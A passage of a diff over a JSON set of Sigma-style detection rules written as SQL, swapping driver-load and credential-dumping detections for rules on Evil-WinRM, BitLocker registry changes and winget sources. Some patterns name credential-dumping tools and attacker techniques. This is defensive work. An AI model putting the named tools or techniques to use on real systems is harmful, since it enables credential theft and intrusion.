vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - WinRM Access Via Evil-WinRM", + "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "status": "test", + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": 
"proc_creation_win_hktl_evil_winrm.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' 
ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", + "description": "Detects usage of winget to add new potentially suspicious download sources", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE 
'\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' 
ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes 
LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21edff2937eb5cd6f6b0acb7ee5247681f624260%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f052dc35b74a1a6246842fbb35eb481577537826%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f0c463d29a5914b01e4607889094f1b7d95e7aaf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0c26ab1299adcd9a385b541ef1653728270aa23e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f36a47edfacd85e0c6d4d22133dd386aee4eec15%' ESCAPE '\\' OR Hashes LIKE '%SHA1=460008b1ffd31792a6deadfa6280fb2a30c8a5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=738b7918d85e5cb4395df9e3f6fc94ddad90e939%' ESCAPE '\\' OR Hashes LIKE '%SHA1=43419df1f9a07430a18c5f3b3cc74de621be0f8e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=558aad879b6a47d94a968f39d0a4e3a3aaef1ef1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7fb52290883a6b69a96d480f2867643396727e83%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f5696fb352a3fbd14fb1a89ad21a71776027f9ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=693a2645c28fc3b248fda95179c36c3ac64f6fc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d25340ae8e92a6d29f599fef426a2bc1b5217299%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe10018af723986db50701c8532df5ed98b17c39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a21c84c6bf2e21d69fa06daaf19b4cc34b589347%' ESCAPE '\\' OR Hashes LIKE '%SHA1=82ba5513c33e056c3f54152c8555abf555f3e745%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=d098600152e5ee6a8238d414d2a77a34da8afaaa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=64e4ac8b9ea2f050933b7ec76a55dd04e97773b4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc1e5fd826961d93b76abd161314cb3592c4436%' ESCAPE '\\' OR Hashes LIKE '%SHA1=90a76945fd2fa45fab2b7bcfdaf6563595f94891%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b03b1996a40bfea72e4584b82f6b845c503a9748%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c771ea59f075170e952c393cfd6fc784b265027c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0918277fcdc64a9dc51c04324377b3468fa1269b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b09bcc042d60d2f4c0d08284818ed198cededa04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15df139494d2c40a645fb010908551185c27f3c5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=012db3a80faf1f7f727b538cbe5d94064e7159de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d04e5db5b6c848a29732bfd52029001f23c3da75%' ESCAPE '\\' OR Hashes LIKE '%SHA1=490109fa6739f114651f4199196c5121d1c6bdf2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d014b5edd6e19ce0e8395a64faedf49688ecb5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a87d6eac2d70a3fbc04e59412326b28001c179de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3f223581409492172a1e875f130f3485b90fbe5f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5db61d00a001fd493591dc919f69b14713889fc5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9923c8f1e565a05b3c738d283cf5c0ed61a0b90f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15d1a6a904c8409fb47a82aefa42f8c3c7d8c370%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9d07df024ec457168bf0be7e0009619f6ac4f13c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9a35ae9a1f95ce4be64adc604c80079173e4a676%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6bd965300f07012d1b651a9b8776028c45b149a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e83458c4a6383223759cd8024e60c17be4e7c85f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb3de54667548a5c9abf5d8fa47db4097fcee9f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c24dd75e4074041dbe03bf21f050c77d748b8e9%' ESCAPE 
'\\' OR Hashes LIKE '%SHA1=dc55217b6043d819eadebd423ff07704ee103231%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e92817a8744ebc4e4fa5383cdce2b2977f01ecd4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc0e97adb756c0f30b41840a59b85218cbdd198f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d0d39e1061f30946141b6ecfa0957f8cc3ddeb63%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6d349823bbb1f5b44bae91357895dba653c5861%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f42f28d164205d9f6dab9317c9fecad54c38d5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8183a341ba6c3ce1948bf9be49ab5320e0ee324d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb1ecad3d37bb980f908bf1a912415cff32e79e6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb0d45aa6f537f5b2f90f3ad99013606eafcd162%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6053d258096bccb07cb0057d700fe05233ab1fbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=29a190727140f40cea9514a6420f5a195e36386b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a4b2c56c12799855162ca3b004b4b2078c6ecf77%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7667b72471689151e176baeba4e1cd9cd006a09a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7f7594ff084201c0d9fa2f4ef1626635b67bce5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=99201c9555e5faf6e8d82da793b148311f8aa4b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=947db58d6f36a8df9fa2a1057f3a7f653ccbc42e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d702d88b12233be9413446c445f22fda4a92a1d9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=910cb12aa49e9f35ecc4907e8304adf0dcca8cf1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=643383938d5e0d4fd30d302af3e9293a4798e392%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4ed28fdfba7b8a8dfe39e591006f25d39990f07%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b0032b8d8e6f4bd19a31619ce38d8e010f29a816%' ESCAPE '\\' OR Hashes LIKE '%SHA1=db6245578ec57bd767b27ecf8085095e1c8e5a6e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=166759fd511613414d3213942fe2575b926a6226%' 
ESCAPE '\\' OR Hashes LIKE '%SHA1=02a8b74899591da7b7f49c0450328d39b939d7e4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=98ceed786f79288becc08c3b82c57e8d4bfa1bca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f6b3577ea4b1a5641ae3421151a26268434c3db8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4de33d03fee52f396a1c788000ca868d56ac30de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6920171fa6dff2c17eb83befb5fd28e8dddf5f0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fbc6d2448739ddec35bb5d6c94b46df4148f648d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6b54f8f137778c1391285fee6150dfa58a8120b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=943593e880b4d340f2548548e6e673ef6f61eed3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e44297a2b750ec1958bef265e2f1ae6fa4323b28%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aa2ea973bb248b18973e57339307cfb8d309f687%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3a5d176c50f97b71d139767ed795d178623f491d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=25d812a5ece19ea375178ef9d60415841087726e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3795e32592ab6d8074b6f7ad33759c6a39b0df07%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fc121ed6fb37e97a004b6faf217435b772dfc4c0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ab2b8602e4baef828b58b995d0889a8e5b8dbd02%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cf040040628b58f4a811f98c2690913c1e8e4e3c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3296844d22c87dd5eba3aa378a8242b41d59db7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bc47e15537fa7c32dfefd23168d7e1741f8477ed%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb22723faa5ae2809476e5c5e9b9a597b26cab9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f3c5e723ae009b336cd2719137b8cd194c9ee51d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41f2d0f9863bce8920c207b1ef5d3d32b603edef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb93d2f564fea9b3dc350f386b45de2cd9a3e001%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3cd037fbba8aae82c1b111c9f8755349c98bcb3c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9401389fba314d1810f83edce33c37e84a78e112%' ESCAPE '\\' OR Hashes LIKE 
